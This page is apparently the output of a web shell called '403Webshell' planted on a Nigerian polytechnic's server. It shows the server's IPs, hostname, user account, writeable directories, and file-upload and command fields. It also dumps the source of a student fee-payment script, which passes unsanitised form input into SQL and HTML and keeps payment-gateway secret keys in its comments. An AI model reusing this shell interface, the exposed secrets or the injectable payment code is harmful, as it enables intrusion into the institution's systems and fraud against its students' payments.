403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.69.58.211
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_admin_student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/ace_admin_student/bankIT.php
<?php
session_start();
//die("Will be back very Soon...");
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Making Payment via eTranzact</title>
</head>
<body topmargin="0" leftmargin="0" >
<?php
//Generate your own unique transId per transaction.
 $time = time();
require_once('eTranConstant.php');
//die('here');
//$id=$_SESSION['sn'];
//$orderID=$_SESSION['transID']="sf-ACE19".$id.mt_rand(1000, 9999);
$transId =$orderID;
$payerName=$_POST['payerName'];
$payerEmail=$_POST['payerEmail'];
$payerPhone=$_POST['payerPhone'];
$formNo=$_SESSION['matNo'];
$matNo=$_SESSION['matNo'];
if ($transId==null) $transId="etz".$time."bankIT";
//$terminalId = "0000000001";
//$terminalId = "7006031633";
if ($terminalId == null) $terminalId = "0000000001";
$success ="";
$amount = $_POST['amt'];
//$responseurl = "http://localhost/federalpolyede/ace_admin_student/responseBankIT.php";
//$notification = "http://localhost/federalpolyede/ace_admin_student/responseBankIT.php";
if ($amount == null) $amount = 100;
//session_register("TOTAL");
//echo "Amount Charged: ".$amount;
//$descr =$_SESSION['paymentType']= "School Fees";
if ($descr == null) $descr = "";
//$secret_key="grPi6jWxFtnxv4FB";
//$secret_key="DEMO_KEY";
$str=$amount.$terminalId.$transId.$responseurl.$secret_key;
$checksum=hash("sha256" ,$str);
$cheksum=hash("sha256" ,$amount.$terminalId.$transId.$responseurl.$secret_key);
//$checksum="d41d8cd98f00b204e9800998ecf8427e";
//10000000000001Peter1234567878987http://nsuid.com.ng/faq.phpDEMO_KEY
//https://www.etranzact.net/WebConnectPlus/query.jsp 
//1000http://nsuid.com.ng/faq.phpDEMO_KEY
//echo "Requesting Transaction ID . . .  ";
$descr2=$descr.'~'.$payerName.'~'.$_SESSION['course'].'~'.$_SESSION['matNo'];
if ($success == null){ //or success = "" for php
	echo "<form method='POST' action='https://www.etranzact.net/bankIT/'>";
//	echo "<form method='POST' action='https://demo.etranzact.com/bankIT/'>";
	echo "<input type='hidden' name='TERMINAL_ID' value='".$terminalId."'>";
	echo "<input type='hidden' name = 'TRANSACTION_ID' value='".$transId."'>";
	echo "<input type='hidden' name = 'AMOUNT' value='".$amount."'>";
	echo "<input type='hidden' name = 'DESCRIPTION' value='$descr'>";
	echo "<input type='hidden' name = 'RESPONSE_URL' value='".$responseurl."'>";
	echo "<input type='hidden' name = 'NOTIFICATION_URL' value='".$notification."'>";
	echo "<input type='hidden' name = 'CHECKSUM' value='".$checksum."'>";
    echo "<input type='hidden' name = 'COL1' value='".$payerName."'>";
    echo "<input type='hidden' name = 'COL2' value='".$payerEmail."'>";
    echo "<input type='hidden' name = 'COL3' value='".$payerPhone."'>";
    echo "<input type='hidden' name = 'COL4' value='".$_SESSION['course']."'>";
    echo "<input type='hidden' name = 'COL5' value='".$_SESSION['matNo']."'>";
//	echo "<input type='hidden' name = 'LOGO_URL' value='localhost/federalpolyede/image/eTranLogo.PNG'>";
    echo "<input type='hidden' name = 'LOGO_URL' value='https://www.federalpolyede.edu.ng/images/etranLogo.PNG'>";
	echo "</form>";

    require('../connect.php');
    $db=db_connect();
    $channel=$_SESSION['medium'];
    require('../filetoU/logFile.php');
    $logD='OrderID: '.$orderID.' ACE_PaymentType: '.$descr;
    logDetail($formNo,$logD);
    $ip2=$_SERVER['HTTP_X_FORWARDED_FOR'];
    $ip1=$_SERVER['REMOTE_ADDR'];
    $amount2=$amount-1050;
    $aspoa="INSERT INTO `fedpoly`.`ace_remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`pay_session`,`channnel`) VALUES (NULL, '$orderID', '0', CURRENT_TIMESTAMP, '-1', '$formNo', 'Not Yet Approved', '$amount2', '$descr', 'False','$ip1','$ip2','2018/2019','$channel')";

    $db->query($aspoa);

//die($aspoa);
    $aspoa2="UPDATE `fedpoly`.`ace_admitted` SET `email` = '$payerEmail',`gsm` = '$payerPhone' WHERE `ace_admitted`.`formNo` = '$formNo'";

    $db->query($aspoa2);
//    die($aspoa2);


    echo "<script language='javascript'>";
    echo "var form = document.forms[0];";
    echo "form.submit()</script>";
}else if ($success == "0"){
    //deal with successful transaction
    echo "Transaction Successfull";

    session_register("transId");

}else	//Deal with Timeout Here, Transaction ID no more valid
	echo "Error while requesting for transaction authorisation, Transaction ID no more valid ";
?>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit